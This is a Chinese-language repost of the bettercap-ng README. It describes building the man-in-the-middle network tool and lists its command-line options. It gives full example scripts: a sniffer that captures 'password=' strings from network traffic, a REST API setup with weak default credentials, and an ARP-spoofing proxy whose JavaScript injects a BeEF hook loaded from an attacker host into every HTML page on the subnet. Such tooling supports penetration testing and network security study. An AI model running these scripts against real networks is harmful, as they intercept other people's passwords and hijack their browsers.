bettercap-NG

编译

确保你有一个正确配置的Go> = 1.8环境,并libpcap-dev为你的系统安装了软件包,然后:

git clone https://github.com/evilsocket/bettercap-ng $GOPATH/src/github.com/evilsocket/bettercap-ng
cd $GOPATH/src/github.com/evilsocket/bettercap-ng
make deps
make

要显示命令行选项:

# sudo ./bettercap-ng -h

Usage of ./bettercap-ng:
  -caplet string
        Read commands from this file and execute them in the interactive session.
  -debug
        Print debug messages.
  -eval string
        Run a command, used to set variables via command line.
  -iface string
        Network interface to bind to.
  -no-history
        Disable history file.
  -silent
        Suppress all logs which are not errors.

Caplets

交互式会话可以用.cap文件编写脚本,或者caplets,下面是几个基本示例,查看caplets文件夹以获得更多信息。

caplets/simple-password-sniffer.cap

简单的密码嗅探器。

# keep reading arp table for network mapping
net.recon on
# setup a regular expression for packet payloads
set net.sniff.regexp .*password=.+
# set the sniffer output file
set net.sniff.output passwords.pcap
# start the sniffer
net.sniff on

caplets/rest-api.cap

Start a rest API.

# change these!
set api.rest.username bcap
set api.rest.password bcap
# set api.rest.port 8082

# actively probe network for new hosts
net.probe on
net.recon on

# enjoy /api/session and /api/events
api.rest on

获取有关当前会话的信息:

curl -k --user bpcap:bcap https://bettercap-ip:8083/api/session

在当前交互式会话中执行命令:

curl -k --user bcap:bcap https://bettercap-ip:8083/api/session -H "Content-Type: application/json" -X POST -d '{"cmd":"net.probe on"}'

获取最后50项活动:

curl -k --user bpcap:bcap https://bettercap-ip:8083/api/events?n=50

清除事件:

curl -k --user bpcap:bcap -X DELETE https://bettercap-ip:8083/api/events

caplets/beef-inject.cap

使用代理脚本来注入一个BEEF的JavaScript钩子:

# targeting the whole subnet by default, to make it selective:
#
#   sudo ./bettercap-ng -caplet caplets/beef-active.cap -eval "set arp.spoof.targets 192.168.1.64"

# inject beef hook
set http.proxy.script caplets/beef-inject.js
# keep reading arp table for network mapping
net.recon on
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on

该caplets/beef.inject.js代理脚本文件:

function onLoad() {
    console.log( "BeefInject loaded." );
    console.log("targets: " + env['arp.spoof.targets']);
}

function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace( 
                '</head>', 
                '<script type="text/javascript" src="http://your-beef-box:3000/hook.js"></script></head>' 
            ); 
            res.Updated();
        }
    }
}

交互模式

交互模式允许您即时手动启动和停止模块,更改选项并实时应用新的防火墙规则,以显示帮助菜单类型help,您可以使用模块特定的帮助help module-name。


转载请注明出处:https://www.freearoot.com/index.php/bettercap-ng.html

文章来源:https://github.com/evilsocket/bettercap-ng